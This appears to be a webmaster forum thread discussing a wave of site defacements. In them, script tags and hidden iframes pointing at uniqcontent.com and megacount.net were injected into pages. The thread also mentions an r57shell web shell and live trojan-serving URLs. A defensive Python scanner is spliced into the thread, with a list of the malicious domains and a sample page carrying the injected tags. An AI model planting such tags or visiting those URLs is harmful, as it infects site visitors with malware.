Recent uniqcontent / megacount trojan exploits summary
The past couple of weeks I've been seeing this exploit happen to more and more people.
It's either a javascript trojan insertion connecting to uniqcontent.com or an iframe trojan insertion connecting to megacount.com or both.... We have had this happen to a couple customers. Unfortunately each fix has been slightly different. Some of the fixes have been:

Getting rid of a counter
Getting rid of a 3rd party WordPress template
Fixing WordPress file permissions

Below are some of the recent threads started:

http://www.gfy.com/showthread.php?t=660506
http://www.gofuckyourself.com/showthread.php?t=661811
http://www.gofuckyourself.com/showthread.php?t=662380
http://www.gofuckyourself.com/showthread.php?t=661965
http://www.gofuckyourself.com/showthread.php?t=662468
http://www.gofuckyourself.com/showthread.php?t=664196

Originally people thought this was directly related to WordPress, but it appears to be happening to non-WP sites as well. There are 4 or 5 hosts mentioned, so this is not host specific. Then it was thought to be a cPanel issue, but not everyone is running cPanel.

dissipate posted these links:

http://www.securiteam.com/unixfocus/6R0030UH5W.html
http://www.securiteam.com/unixfocus/6M00315H5S.html

other suggestions:

http://www.securityfocus.com/bid/14088/info
http://www.securityfocus.com/bid/18372

No one has really followed up with how the issue has been resolved. I'm basically trying to get all the info into one thread for any others that may come across this exploit.
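A defender-side check for the injection described above, added here as an example and not code from the thread: it scans HTML files for script and iframe tags whose src points at the callback domains named in the thread (uniqcontent.com, megacount.com/.net, clvcnt.com), reporting the tag, URL and line number so the injected lines can be located and removed. The sample page it runs on is constructed, not taken from any real site.

```python
import re
from pathlib import Path

# Callback hosts reported in the thread for the injected script/iframe tags.
SUSPECT_DOMAINS = ("uniqcontent.com", "megacount.com", "megacount.net", "clvcnt.com")

# <script ... src=...> or <iframe ... src=...>, any case, any attribute order,
# quoted or unquoted src; the injections are often upper-case and 1x1 hidden.
TAG_RE = re.compile(
    r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def host_of(url: str) -> str:
    """Extract the host part of a URL (empty for relative paths)."""
    no_scheme = re.sub(r"^[a-z]+://", "", url, flags=re.IGNORECASE)
    return no_scheme.split("/")[0].split(":")[0].lower()


def find_injections(html: str) -> list:
    """Return (tag, url, line_no) for every script/iframe whose src host is suspect."""
    hits = []
    for m in TAG_RE.finditer(html):
        tag, url = m.group(1).lower(), m.group(2)
        host = host_of(url)
        if any(host == d or host.endswith("." + d) for d in SUSPECT_DOMAINS):
            line_no = html.count("\n", 0, m.start()) + 1
            hits.append((tag, url, line_no))
    return hits


def scan_tree(root) -> dict:
    """Scan .html/.htm/.php files below root; map path -> hits for files that have any."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".html", ".htm", ".php"):
            hits = find_injections(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed sample page: a normal page with two injected tags of the reported kind.
SAMPLE_HTML = """<html><head><title>Tour</title>
<script type="text/javascript" src="http://www.uniqcontent.com/x.js"></script>
</head><body>
<p>Welcome</p>
<IFRAME SRC="http://megacount.net/cnt/?id=1" width=1 height=1 style="visibility:hidden"></IFRAME>
<script src="/js/site.js"></script>
</body></html>"""

if __name__ == "__main__":
    for tag, url, line in find_injections(SAMPLE_HTML):
        print(f"line {line}: <{tag}> -> {url}")
```

Run scan_tree("/path/to/htdocs") over a site's document root to list every file that carries one of these tags.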
I'm VERY much in this with you.........
Two of my sites were hacked yesterday with this megacount.net exploit hidden and put onto my html pages.
I want to know how they got in... According to Jupiter Hosting whom I host with it appears they simply logged in with a password... Maybe a harvester or something or keystroke logger. But with the epidemic of sites that got hacked in the past few days, I'm thinking there must be some security hole somewhere that we don't know about. I'm aware of the assumptions of cpanel and wordpress and the others. None of that applies to me... Again, I don't know how they got in.
I'm thinking, and have had it suggested to me, to upgrade versions of Apache and php....
There are known security holes in older versions of them, but we have not concluded that this hack is due to any of this...
As I mentioned my host didn't notice any security breaches.. They noted that someone just logged right in and did this..
Which brings to mind, I think our local PCs have some trojan on them that is recording our logins, or corrupting files as we upload via ftp..... I think this may be more of a local issue rather than a server one?? What do you think?
List what wordpress plugins you have installed
it's not a vanilla wordpress problem as the exploit isn't *THAT* common
boneprone isn't running wordpress at all.
Anyone without third-party software/scripts who got infected?
but on the other hand....
i was chatting with boneprone and he mentioned that he scanned his computer and found a trojan, and the pages being exploited were ones that he had been working on and had uploaded to his server. so possibly his FTP info was grabbed, or the virus/trojan on his computer was automatically infecting the pages as he uploaded.
Quote:
I had not uploaded anything to that domain..... So my theory is shot.. Back to step 1.
My server Support guy:
"Found nudedorms.com/htdocs/aff/geoip.php - r57shell exploit. dated Oct 8, 8:56am I renamed it from geoip.php to geoip.php.txt so it can't be executed, but we can read it. I already made a copy for myself, so delete it if you want. http://nudedorms.com/aff/geoip.php.txt It was owned by webmaster, and not the apache user, so it wasn't a php exploit. A corresponding login during that time was from as the user MuratAT3, Gavin suspected that was one of the hackers IPs, So if it was a weak password, and they guessed it, that's one way they could have done this. Or maybe they somehow got the password via some other way, but one thing is for sure, they just straight up logged in and knew the password, then uploaded their junk." They are convinced the server wasn't compromised... But that indeed the hacker got his login and pass from some other means and simply walked on in with info on hand.. And it couldn't have been a corrupt file that I uploaded, cause I never used the username MuratAT3.. It's an old user name to the box. Naturally it's been removed by now.. But that's what these guys used so it seems.
Hope you get this resolved guys
i just had an account on a shared server running hsphere hacked and megacount added :(
tech is working on finding the hole they got in through. only one account was hacked though, not the whole server.
I am still a bit confused by it all.
My hosting company (webair) stated that someone had just logged in with my info. This was my first initial thought and had changed the password, my account was still hacked after this. My password was changed again and now nothing has happened. At all times I had anti virus/trojan/spyware programs running and had scanned my system at least 1 time per week and nothing was found. Also - at some times that my site was hacked I did nothing to the site, shut my computers off and took a vacation. But most of the time it was hacked I never even uploaded anything I would just write posts in the blog.
ok, so 2 times it has been said that someone had logged in to the account and uploaded the infected files.
i just read on one of the other boards about someone having the same issue. This is what they said:
"ok here is what my hosting company says: I checked your login history and I see logins from several different addresses, in addition, in the index.html on domain.com it looks like it contains malicious javascript. What I'm guessing happened was someone got your password somehow, then modified your index pages to include this. You can go in and delete it from the index pages."
i'm seeing some new domains now:
clvcnt.com/nmd/trf/ (DON'T load this, it tries to download a trojan)
clvcnt.com/nmd/trf/gc2/
xmlrpc no?
i believe the trojan downloads:
sploit.anr and xpl.wmf but the issue is how people's pages are being altered with the code
My webair accounts are still clean after the update. Imagine how many computers are infected now.
I'm sure we will see a drop in sales, because it's likely that the Trojan is replacing the affiliate-codes. I think these attacks are quite targeted. ONLY my adult sites have been touched. It's like they scanned for sites that link to selected affiliate programs.
It appears to be another spin on an old php exploit with phpSecurePages.
I'd be interested in knowing if there were any machines hit that did *not* have a copy of the file secure.php anywhere on their server. Here is another version of the one that hit boneprone...from Iranian hackers. http://www.milw0rm.com/exploits/2452 Though the above link is safe, I do not recommend going to any links found in that code (or any other exploit code for that matter).
Damn, I'm sorry to hear that...
I hope you can fix everything...
buuuuump just got hit AGAIN today